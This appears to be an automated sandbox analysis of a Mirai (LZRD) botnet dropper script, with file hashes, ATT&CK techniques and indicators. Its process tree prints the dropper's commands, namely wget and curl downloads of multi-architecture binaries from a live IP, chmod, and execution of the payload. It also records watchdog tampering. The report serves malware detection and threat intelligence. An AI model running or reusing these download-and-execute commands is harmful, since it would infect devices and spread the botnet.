mirai | 8aa5a26c3c99eb1c6b59b1396880545253b62746117a2f122c658acf3b418433

Analysis

max time kernel
149s
max time network
150s
platform
ubuntu-18.04_amd64
resource
ubuntu1804-amd64-20240611-en
resource tags

arch:amd64arch:i386image:ubuntu1804-amd64-20240611-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system
submitted
26/03/2025, 23:18

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ohshit.sh
Size

3KB
MD5

3b746c5758c3e8191384e8e28cadd0ae
SHA1

cf7164adbb686ad45e8512dd2660fc1124794566
SHA256

8aa5a26c3c99eb1c6b59b1396880545253b62746117a2f122c658acf3b418433
SHA512

70afe1a6a19dcb83b449351b25ea414a3c6e54e4249d637f4b8026aa0b5cf972b5da0ec374d72c1cb43349475d66829253b4f95c6709fbd26e925e995f5f73bf

Score

10^/10

mirai lzrd botnet defense_evasion discovery upx

Malware Config

Extracted

Family

mirai

Botnet

LZRD

Extracted

Family

mirai

Botnet

LZRD

Signatures

Mirai
Mirai is a prevalent Linux malware infecting exposed network devices.
botnet mirai
Mirai family
mirai

File and Directory Permissions Modification 1 TTPs 15 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
1554	chmod
1586	chmod
1606	chmod
1626	chmod
1666	chmod
1656	chmod
1528	chmod
1534	chmod
1544	chmod
1596	chmod
1636	chmod
1564	chmod
1576	chmod
1616	chmod
1646	chmod

Executes dropped EXE 15 IoCs

ioc	pid	Process
/tmp/Chaotic	1529	ohshit.sh
/tmp/Chaotic	1535	ohshit.sh
/tmp/Chaotic	1545	ohshit.sh
/tmp/Chaotic	1555	ohshit.sh
/tmp/Chaotic	1565	ohshit.sh
/tmp/Chaotic	1577	ohshit.sh
/tmp/Chaotic	1587	ohshit.sh
/tmp/Chaotic	1597	ohshit.sh
/tmp/Chaotic	1607	ohshit.sh
/tmp/Chaotic	1617	ohshit.sh
/tmp/Chaotic	1627	ohshit.sh
/tmp/Chaotic	1637	ohshit.sh
/tmp/Chaotic	1647	ohshit.sh
/tmp/Chaotic	1657	ohshit.sh
/tmp/Chaotic	1667	ohshit.sh

Modifies Watchdog functionality 1 TTPs 2 IoCs

Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.

defense_evasion

Impair Defenses

T1562

description	ioc	Process
File opened for modification	/dev/watchdog	ohshit.sh
File opened for modification	/dev/misc/watchdog	ohshit.sh

Enumerates running processes
Discovers information about currently running processes on the system

Writes file to system bin folder 2 IoCs

description	ioc	Process
File opened for modification	/bin/watchdog	ohshit.sh
File opened for modification	/sbin/watchdog	ohshit.sh

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/fstream-5.dat	upx

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/645/status	ohshit.sh
File opened for reading	/proc/1176/status	ohshit.sh
File opened for reading	/proc/1203/status	ohshit.sh
File opened for reading	/proc/1548/status	ohshit.sh
File opened for reading	/proc/1592/status	ohshit.sh
File opened for reading	/proc/1600/status	ohshit.sh
File opened for reading	/proc/1637/status	ohshit.sh
File opened for reading	/proc/1647/status	ohshit.sh
File opened for reading	/proc/12/status	ohshit.sh
File opened for reading	/proc/16/status	ohshit.sh
File opened for reading	/proc/18/status	ohshit.sh
File opened for reading	/proc/664/status	ohshit.sh
File opened for reading	/proc/946/status	ohshit.sh
File opened for reading	/proc/961/status	ohshit.sh
File opened for reading	/proc/1071/status	ohshit.sh
File opened for reading	/proc/1149/status	ohshit.sh
File opened for reading	/proc/21/status	ohshit.sh
File opened for reading	/proc/1136/status	ohshit.sh
File opened for reading	/proc/1237/status	ohshit.sh
File opened for reading	/proc/1550/status	ohshit.sh
File opened for reading	/proc/1590/status	ohshit.sh
File opened for reading	/proc/1608/status	ohshit.sh
File opened for reading	/proc/1610/status	ohshit.sh
File opened for reading	/proc/1630/status	ohshit.sh
File opened for reading	/proc/15/status	ohshit.sh
File opened for reading	/proc/22/status	ohshit.sh
File opened for reading	/proc/30/status	ohshit.sh
File opened for reading	/proc/32/status	ohshit.sh
File opened for reading	/proc/78/status	ohshit.sh
File opened for reading	/proc/1517/status	ohshit.sh
File opened for reading	/proc/1612/status	ohshit.sh
File opened for reading	/proc/1652/status	ohshit.sh
File opened for reading	/proc/8/status	ohshit.sh
File opened for reading	/proc/415/status	ohshit.sh
File opened for reading	/proc/450/status	ohshit.sh
File opened for reading	/proc/1282/status	ohshit.sh
File opened for reading	/proc/1523/status	ohshit.sh
File opened for reading	/proc/1640/status	ohshit.sh
File opened for reading	/proc/1662/status	ohshit.sh
File opened for reading	/proc/416/status	ohshit.sh
File opened for reading	/proc/561/status	ohshit.sh
File opened for reading	/proc/1124/status	ohshit.sh
File opened for reading	/proc/1582/status	ohshit.sh
File opened for reading	/proc/1602/status	ohshit.sh
File opened for reading	/proc/1648/status	ohshit.sh
File opened for reading	/proc/26/status	ohshit.sh
File opened for reading	/proc/177/status	ohshit.sh
File opened for reading	/proc/467/status	ohshit.sh
File opened for reading	/proc/534/status	ohshit.sh
File opened for reading	/proc/1119/status	ohshit.sh
File opened for reading	/proc/1153/status	ohshit.sh
File opened for reading	/proc/1190/status	ohshit.sh
File opened for reading	/proc/1514/status	ohshit.sh
File opened for reading	/proc/filesystems	cp
File opened for reading	/proc/1128/status	ohshit.sh
File opened for reading	/proc/1267/status	ohshit.sh
File opened for reading	/proc/2/status	ohshit.sh
File opened for reading	/proc/463/status	ohshit.sh
File opened for reading	/proc/684/status	ohshit.sh
File opened for reading	/proc/1196/status	ohshit.sh
File opened for reading	/proc/180/status	ohshit.sh
File opened for reading	/proc/1080/status	ohshit.sh
File opened for reading	/proc/1157/status	ohshit.sh
File opened for reading	/proc/1177/status	ohshit.sh

System Network Configuration Discovery 1 TTPs 4 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

pid	Process
1561	wget
1562	curl
1573	wget
1574	curl

Writes file to tmp directory 30 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.arm	curl
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.ppc	wget
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.m68k	wget
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.x86_64	wget
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.x86_64	curl
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.m68k	curl
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.arc	wget
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.arc	curl
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.mips	curl
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.mips64	curl
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.arm7	wget
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.sh4	wget
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.i686	wget
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.mpsl	wget
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.arm5	curl
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.arm6	wget
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.x86	wget
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.i686	curl
File opened for modification	/tmp/busybox	cp
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.arm6	curl
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.ppc	curl
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.sparc	curl
File opened for modification	/tmp/Chaotic	ohshit.sh
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.mpsl	curl
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.arm	wget
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.arm7	curl
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.x86	curl
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.mips	wget
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.arm5	wget
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.sh4	curl

/tmp/ohshit.sh
/tmp/ohshit.sh
1⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
- Writes file to tmp directory
PID:1520
- /bin/cp
  cp /bin/busybox /tmp/
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:1521
- /usr/bin/wget
  wget http://61.7.209.116/HideChaotic/ub8ehJSePAfc9FYqZIT6.arc
  2⤵
  - Writes file to tmp directory
  PID:1522
- /usr/bin/curl
  curl -O http://61.7.209.116/HideChaotic/ub8ehJSePAfc9FYqZIT6.arc
  2⤵
  - Writes file to tmp directory
  PID:1526
- /bin/cat
  cat ub8ehJSePAfc9FYqZIT6.arc
  2⤵
  PID:1527
- /bin/chmod
  chmod +x busybox Chaotic config-err-Pzue4d netplan_4c_7ljym ohshit.sh snap-private-tmp ssh-oGhne8CwRJKN systemd-private-f3a488b8bf9547eaa229b65a3b571a72-bolt.service-GM5cDx systemd-private-f3a488b8bf9547eaa229b65a3b571a72-colord.service-8CgRXE systemd-private-f3a488b8bf9547eaa229b65a3b571a72-ModemManager.service-ql0EjV systemd-private-f3a488b8bf9547eaa229b65a3b571a72-systemd-resolved.service-wf84C9 systemd-private-f3a488b8bf9547eaa229b65a3b571a72-systemd-timedated.service-KYIcwa ub8ehJSePAfc9FYqZIT6.arc
  2⤵
  - File and Directory Permissions Modification
  PID:1528
- /tmp/Chaotic
  ./Chaotic
  2⤵
  PID:1529
- /usr/bin/wget
  wget http://61.7.209.116/HideChaotic/ub8ehJSePAfc9FYqZIT6.x86
  2⤵
  - Writes file to tmp directory
  PID:1531
- /usr/bin/curl
  curl -O http://61.7.209.116/HideChaotic/ub8ehJSePAfc9FYqZIT6.x86
  2⤵
  - Writes file to tmp directory
  PID:1532
- /bin/cat
  cat ub8ehJSePAfc9FYqZIT6.x86
  2⤵
  PID:1533
- /bin/chmod
  chmod +x busybox Chaotic config-err-Pzue4d netplan_4c_7ljym ohshit.sh snap-private-tmp ssh-oGhne8CwRJKN systemd-private-f3a488b8bf9547eaa229b65a3b571a72-bolt.service-GM5cDx systemd-private-f3a488b8bf9547eaa229b65a3b571a72-colord.service-8CgRXE systemd-private-f3a488b8bf9547eaa229b65a3b571a72-ModemManager.service-ql0EjV systemd-private-f3a488b8bf9547eaa229b65a3b571a72-systemd-resolved.service-wf84C9 systemd-private-f3a488b8bf9547eaa229b65a3b571a72-systemd-timedated.service-KYIcwa ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.x86
  2⤵
  - File and Directory Permissions Modification
  PID:1534
- /usr/bin/wget
  wget http://61.7.209.116/HideChaotic/ub8ehJSePAfc9FYqZIT6.x86_64
  2⤵
  - Writes file to tmp directory
  PID:1541
- /usr/bin/curl
  curl -O http://61.7.209.116/HideChaotic/ub8ehJSePAfc9FYqZIT6.x86_64
  2⤵
  - Writes file to tmp directory
  PID:1542
- /bin/chmod
  chmod +x busybox Chaotic config-err-Pzue4d netplan_4c_7ljym ohshit.sh snap-private-tmp ssh-oGhne8CwRJKN systemd-private-f3a488b8bf9547eaa229b65a3b571a72-bolt.service-GM5cDx systemd-private-f3a488b8bf9547eaa229b65a3b571a72-colord.service-8CgRXE systemd-private-f3a488b8bf9547eaa229b65a3b571a72-ModemManager.service-ql0EjV systemd-private-f3a488b8bf9547eaa229b65a3b571a72-systemd-resolved.service-wf84C9 systemd-private-f3a488b8bf9547eaa229b65a3b571a72-systemd-timedated.service-KYIcwa ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:1544
- /usr/bin/wget
  wget http://61.7.209.116/HideChaotic/ub8ehJSePAfc9FYqZIT6.i686
  2⤵
  - Writes file to tmp directory
  PID:1551
- /usr/bin/curl
  curl -O http://61.7.209.116/HideChaotic/ub8ehJSePAfc9FYqZIT6.i686
  2⤵
  - Writes file to tmp directory
  PID:1552
- /bin/chmod
  chmod +x busybox Chaotic config-err-Pzue4d netplan_4c_7ljym ohshit.sh snap-private-tmp ssh-oGhne8CwRJKN systemd-private-f3a488b8bf9547eaa229b65a3b571a72-bolt.service-GM5cDx systemd-private-f3a488b8bf9547eaa229b65a3b571a72-colord.service-8CgRXE systemd-private-f3a488b8bf9547eaa229b65a3b571a72-ModemManager.service-ql0EjV systemd-private-f3a488b8bf9547eaa229b65a3b571a72-systemd-resolved.service-wf84C9 systemd-private-f3a488b8bf9547eaa229b65a3b571a72-systemd-timedated.service-KYIcwa ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.i686 ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:1554
- /usr/bin/wget
  wget http://61.7.209.116/HideChaotic/ub8ehJSePAfc9FYqZIT6.mips
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:1561
- /usr/bin/curl
  curl -O http://61.7.209.116/HideChaotic/ub8ehJSePAfc9FYqZIT6.mips
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:1562
- /bin/chmod
  chmod +x busybox Chaotic config-err-Pzue4d netplan_4c_7ljym ohshit.sh snap-private-tmp ssh-oGhne8CwRJKN systemd-private-f3a488b8bf9547eaa229b65a3b571a72-bolt.service-GM5cDx systemd-private-f3a488b8bf9547eaa229b65a3b571a72-colord.service-8CgRXE systemd-private-f3a488b8bf9547eaa229b65a3b571a72-ModemManager.service-ql0EjV systemd-private-f3a488b8bf9547eaa229b65a3b571a72-systemd-resolved.service-wf84C9 systemd-private-f3a488b8bf9547eaa229b65a3b571a72-systemd-timedated.service-KYIcwa ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.i686 ub8ehJSePAfc9FYqZIT6.mips ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:1564
- /usr/bin/wget
  wget http://61.7.209.116/HideChaotic/ub8ehJSePAfc9FYqZIT6.mips64
  2⤵
  - System Network Configuration Discovery
  PID:1573
- /usr/bin/curl
  curl -O http://61.7.209.116/HideChaotic/ub8ehJSePAfc9FYqZIT6.mips64
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:1574
- /bin/chmod
  chmod +x busybox Chaotic config-err-Pzue4d netplan_4c_7ljym ohshit.sh snap-private-tmp ssh-oGhne8CwRJKN systemd-private-f3a488b8bf9547eaa229b65a3b571a72-bolt.service-GM5cDx systemd-private-f3a488b8bf9547eaa229b65a3b571a72-colord.service-8CgRXE systemd-private-f3a488b8bf9547eaa229b65a3b571a72-ModemManager.service-ql0EjV systemd-private-f3a488b8bf9547eaa229b65a3b571a72-systemd-resolved.service-wf84C9 ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.i686 ub8ehJSePAfc9FYqZIT6.mips ub8ehJSePAfc9FYqZIT6.mips64 ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:1576
- /usr/bin/wget
  wget http://61.7.209.116/HideChaotic/ub8ehJSePAfc9FYqZIT6.mpsl
  2⤵
  - Writes file to tmp directory
  PID:1583
- /usr/bin/curl
  curl -O http://61.7.209.116/HideChaotic/ub8ehJSePAfc9FYqZIT6.mpsl
  2⤵
  - Writes file to tmp directory
  PID:1584
- /bin/chmod
  chmod +x busybox Chaotic config-err-Pzue4d netplan_4c_7ljym ohshit.sh snap-private-tmp ssh-oGhne8CwRJKN systemd-private-f3a488b8bf9547eaa229b65a3b571a72-bolt.service-GM5cDx systemd-private-f3a488b8bf9547eaa229b65a3b571a72-colord.service-8CgRXE systemd-private-f3a488b8bf9547eaa229b65a3b571a72-ModemManager.service-ql0EjV systemd-private-f3a488b8bf9547eaa229b65a3b571a72-systemd-resolved.service-wf84C9 ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.i686 ub8ehJSePAfc9FYqZIT6.mips ub8ehJSePAfc9FYqZIT6.mips64 ub8ehJSePAfc9FYqZIT6.mpsl ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:1586
- /usr/bin/wget
  wget http://61.7.209.116/HideChaotic/ub8ehJSePAfc9FYqZIT6.arm
  2⤵
  - Writes file to tmp directory
  PID:1593
- /usr/bin/curl
  curl -O http://61.7.209.116/HideChaotic/ub8ehJSePAfc9FYqZIT6.arm
  2⤵
  - Writes file to tmp directory
  PID:1594
- /bin/chmod
  chmod +x busybox Chaotic config-err-Pzue4d netplan_4c_7ljym ohshit.sh snap-private-tmp ssh-oGhne8CwRJKN systemd-private-f3a488b8bf9547eaa229b65a3b571a72-bolt.service-GM5cDx systemd-private-f3a488b8bf9547eaa229b65a3b571a72-colord.service-8CgRXE systemd-private-f3a488b8bf9547eaa229b65a3b571a72-ModemManager.service-ql0EjV systemd-private-f3a488b8bf9547eaa229b65a3b571a72-systemd-resolved.service-wf84C9 ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.arm ub8ehJSePAfc9FYqZIT6.i686 ub8ehJSePAfc9FYqZIT6.mips ub8ehJSePAfc9FYqZIT6.mips64 ub8ehJSePAfc9FYqZIT6.mpsl ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:1596
- /usr/bin/wget
  wget http://61.7.209.116/HideChaotic/ub8ehJSePAfc9FYqZIT6.arm5
  2⤵
  - Writes file to tmp directory
  PID:1603
- /usr/bin/curl
  curl -O http://61.7.209.116/HideChaotic/ub8ehJSePAfc9FYqZIT6.arm5
  2⤵
  - Writes file to tmp directory
  PID:1604
- /bin/chmod
  chmod +x busybox Chaotic config-err-Pzue4d netplan_4c_7ljym ohshit.sh snap-private-tmp ssh-oGhne8CwRJKN systemd-private-f3a488b8bf9547eaa229b65a3b571a72-bolt.service-GM5cDx systemd-private-f3a488b8bf9547eaa229b65a3b571a72-colord.service-8CgRXE systemd-private-f3a488b8bf9547eaa229b65a3b571a72-ModemManager.service-ql0EjV systemd-private-f3a488b8bf9547eaa229b65a3b571a72-systemd-resolved.service-wf84C9 ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.arm ub8ehJSePAfc9FYqZIT6.arm5 ub8ehJSePAfc9FYqZIT6.i686 ub8ehJSePAfc9FYqZIT6.mips ub8ehJSePAfc9FYqZIT6.mips64 ub8ehJSePAfc9FYqZIT6.mpsl ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:1606
- /usr/bin/wget
  wget http://61.7.209.116/HideChaotic/ub8ehJSePAfc9FYqZIT6.arm6
  2⤵
  - Writes file to tmp directory
  PID:1613
- /usr/bin/curl
  curl -O http://61.7.209.116/HideChaotic/ub8ehJSePAfc9FYqZIT6.arm6
  2⤵
  - Writes file to tmp directory
  PID:1614
- /bin/chmod
  chmod +x busybox Chaotic config-err-Pzue4d netplan_4c_7ljym ohshit.sh snap-private-tmp ssh-oGhne8CwRJKN systemd-private-f3a488b8bf9547eaa229b65a3b571a72-bolt.service-GM5cDx systemd-private-f3a488b8bf9547eaa229b65a3b571a72-colord.service-8CgRXE systemd-private-f3a488b8bf9547eaa229b65a3b571a72-ModemManager.service-ql0EjV systemd-private-f3a488b8bf9547eaa229b65a3b571a72-systemd-resolved.service-wf84C9 ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.arm ub8ehJSePAfc9FYqZIT6.arm5 ub8ehJSePAfc9FYqZIT6.arm6 ub8ehJSePAfc9FYqZIT6.i686 ub8ehJSePAfc9FYqZIT6.mips ub8ehJSePAfc9FYqZIT6.mips64 ub8ehJSePAfc9FYqZIT6.mpsl ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:1616
- /usr/bin/wget
  wget http://61.7.209.116/HideChaotic/ub8ehJSePAfc9FYqZIT6.arm7
  2⤵
  - Writes file to tmp directory
  PID:1623
- /usr/bin/curl
  curl -O http://61.7.209.116/HideChaotic/ub8ehJSePAfc9FYqZIT6.arm7
  2⤵
  - Writes file to tmp directory
  PID:1624
- /bin/chmod
  chmod +x busybox Chaotic config-err-Pzue4d netplan_4c_7ljym ohshit.sh snap-private-tmp ssh-oGhne8CwRJKN systemd-private-f3a488b8bf9547eaa229b65a3b571a72-bolt.service-GM5cDx systemd-private-f3a488b8bf9547eaa229b65a3b571a72-colord.service-8CgRXE systemd-private-f3a488b8bf9547eaa229b65a3b571a72-ModemManager.service-ql0EjV systemd-private-f3a488b8bf9547eaa229b65a3b571a72-systemd-resolved.service-wf84C9 ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.arm ub8ehJSePAfc9FYqZIT6.arm5 ub8ehJSePAfc9FYqZIT6.arm6 ub8ehJSePAfc9FYqZIT6.arm7 ub8ehJSePAfc9FYqZIT6.i686 ub8ehJSePAfc9FYqZIT6.mips ub8ehJSePAfc9FYqZIT6.mips64 ub8ehJSePAfc9FYqZIT6.mpsl ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:1626
- /usr/bin/wget
  wget http://61.7.209.116/HideChaotic/ub8ehJSePAfc9FYqZIT6.ppc
  2⤵
  - Writes file to tmp directory
  PID:1633
- /usr/bin/curl
  curl -O http://61.7.209.116/HideChaotic/ub8ehJSePAfc9FYqZIT6.ppc
  2⤵
  - Writes file to tmp directory
  PID:1634
- /bin/chmod
  chmod +x busybox Chaotic config-err-Pzue4d netplan_4c_7ljym ohshit.sh snap-private-tmp ssh-oGhne8CwRJKN systemd-private-f3a488b8bf9547eaa229b65a3b571a72-bolt.service-GM5cDx systemd-private-f3a488b8bf9547eaa229b65a3b571a72-colord.service-8CgRXE systemd-private-f3a488b8bf9547eaa229b65a3b571a72-ModemManager.service-ql0EjV systemd-private-f3a488b8bf9547eaa229b65a3b571a72-systemd-resolved.service-wf84C9 ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.arm ub8ehJSePAfc9FYqZIT6.arm5 ub8ehJSePAfc9FYqZIT6.arm6 ub8ehJSePAfc9FYqZIT6.arm7 ub8ehJSePAfc9FYqZIT6.i686 ub8ehJSePAfc9FYqZIT6.mips ub8ehJSePAfc9FYqZIT6.mips64 ub8ehJSePAfc9FYqZIT6.mpsl ub8ehJSePAfc9FYqZIT6.ppc ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:1636
- /usr/bin/wget
  wget http://61.7.209.116/HideChaotic/ub8ehJSePAfc9FYqZIT6.sparc
  2⤵
  PID:1643
- /usr/bin/curl
  curl -O http://61.7.209.116/HideChaotic/ub8ehJSePAfc9FYqZIT6.sparc
  2⤵
  - Writes file to tmp directory
  PID:1644
- /bin/chmod
  chmod +x busybox Chaotic config-err-Pzue4d netplan_4c_7ljym ohshit.sh snap-private-tmp ssh-oGhne8CwRJKN systemd-private-f3a488b8bf9547eaa229b65a3b571a72-bolt.service-GM5cDx systemd-private-f3a488b8bf9547eaa229b65a3b571a72-colord.service-8CgRXE systemd-private-f3a488b8bf9547eaa229b65a3b571a72-ModemManager.service-ql0EjV systemd-private-f3a488b8bf9547eaa229b65a3b571a72-systemd-resolved.service-wf84C9 ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.arm ub8ehJSePAfc9FYqZIT6.arm5 ub8ehJSePAfc9FYqZIT6.arm6 ub8ehJSePAfc9FYqZIT6.arm7 ub8ehJSePAfc9FYqZIT6.i686 ub8ehJSePAfc9FYqZIT6.mips ub8ehJSePAfc9FYqZIT6.mips64 ub8ehJSePAfc9FYqZIT6.mpsl ub8ehJSePAfc9FYqZIT6.ppc ub8ehJSePAfc9FYqZIT6.sparc ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:1646
- /usr/bin/wget
  wget http://61.7.209.116/HideChaotic/ub8ehJSePAfc9FYqZIT6.m68k
  2⤵
  - Writes file to tmp directory
  PID:1653
- /usr/bin/curl
  curl -O http://61.7.209.116/HideChaotic/ub8ehJSePAfc9FYqZIT6.m68k
  2⤵
  - Writes file to tmp directory
  PID:1654
- /bin/chmod
  chmod +x busybox Chaotic config-err-Pzue4d netplan_4c_7ljym ohshit.sh snap-private-tmp ssh-oGhne8CwRJKN systemd-private-f3a488b8bf9547eaa229b65a3b571a72-bolt.service-GM5cDx systemd-private-f3a488b8bf9547eaa229b65a3b571a72-colord.service-8CgRXE systemd-private-f3a488b8bf9547eaa229b65a3b571a72-ModemManager.service-ql0EjV systemd-private-f3a488b8bf9547eaa229b65a3b571a72-systemd-resolved.service-wf84C9 ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.arm ub8ehJSePAfc9FYqZIT6.arm5 ub8ehJSePAfc9FYqZIT6.arm6 ub8ehJSePAfc9FYqZIT6.arm7 ub8ehJSePAfc9FYqZIT6.i686 ub8ehJSePAfc9FYqZIT6.m68k ub8ehJSePAfc9FYqZIT6.mips ub8ehJSePAfc9FYqZIT6.mips64 ub8ehJSePAfc9FYqZIT6.mpsl ub8ehJSePAfc9FYqZIT6.ppc ub8ehJSePAfc9FYqZIT6.sparc ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:1656
- /usr/bin/wget
  wget http://61.7.209.116/HideChaotic/ub8ehJSePAfc9FYqZIT6.sh4
  2⤵
  - Writes file to tmp directory
  PID:1663
- /usr/bin/curl
  curl -O http://61.7.209.116/HideChaotic/ub8ehJSePAfc9FYqZIT6.sh4
  2⤵
  - Writes file to tmp directory
  PID:1664
- /bin/chmod
  chmod +x busybox Chaotic config-err-Pzue4d netplan_4c_7ljym ohshit.sh snap-private-tmp ssh-oGhne8CwRJKN systemd-private-f3a488b8bf9547eaa229b65a3b571a72-bolt.service-GM5cDx systemd-private-f3a488b8bf9547eaa229b65a3b571a72-colord.service-8CgRXE systemd-private-f3a488b8bf9547eaa229b65a3b571a72-ModemManager.service-ql0EjV systemd-private-f3a488b8bf9547eaa229b65a3b571a72-systemd-resolved.service-wf84C9 ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.arm ub8ehJSePAfc9FYqZIT6.arm5 ub8ehJSePAfc9FYqZIT6.arm6 ub8ehJSePAfc9FYqZIT6.arm7 ub8ehJSePAfc9FYqZIT6.i686 ub8ehJSePAfc9FYqZIT6.m68k ub8ehJSePAfc9FYqZIT6.mips ub8ehJSePAfc9FYqZIT6.mips64 ub8ehJSePAfc9FYqZIT6.mpsl ub8ehJSePAfc9FYqZIT6.ppc ub8ehJSePAfc9FYqZIT6.sh4 ub8ehJSePAfc9FYqZIT6.sparc ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:1666

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Impair Defenses

T1562

Credential Access

Discovery

System Network Configuration Discovery

T1016

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/Chaotic

Filesize
37KB

MD5
30cd627f38ed8d3f4d88f70db155f6e4

SHA1
dac9a3568bf25a78f8f452f13ee5324c06e0e697

SHA256
6f1da6623189a369e919942eda96a280333476c065f7f52dc104835e7784c7b0

SHA512
bb9292720ffb56044b193ae917ffc81cfd690a5b1ef9e43e87765d9dc15111e401a7a82e7210014c96adce42beace4a803d8fa132e55f0a7687627b734620c6a

Download Submit
/tmp/busybox

Filesize
2.0MB

MD5
b4dede5fc0b1bad5cb8e901bde126b97

SHA1
10cbe9a418ad84a1ed297948539d37aeb58dd810

SHA256
a9f0735d28f9a6a4f2634d3b144156f7b3df3b476a16a5ab0c7bdf98d74dd020

SHA512
45665ce3a42f63a01fdef517e0c4cb943efce64c8a32d3ce07ab4f1fafc23cda77f378d324342efc79dc9d2293c4b4454d06c1cf4997b9e866784de01cb546e6

Download Submit
/tmp/ub8ehJSePAfc9FYqZIT6.arc

Filesize
113KB

MD5
5aaaec2c2edead8e37df9a743a4376f1

SHA1
6510eaf91c6a8e43b76c7cc4c8f67da5e8869cc2

SHA256
8accc9c4f37d8abe5bfe886162ca52aaf6b1ab4f21583126f235cfffe450dba2

SHA512
d1a5d33047fa2d2e9d8ec976f4099d182deb38415f899231b38c15502f56923c8a3efe08d8786960ba9c5a4f62d880e14b081e66feadc3948f2f523557242318

Download Submit

Analysis

Sharing

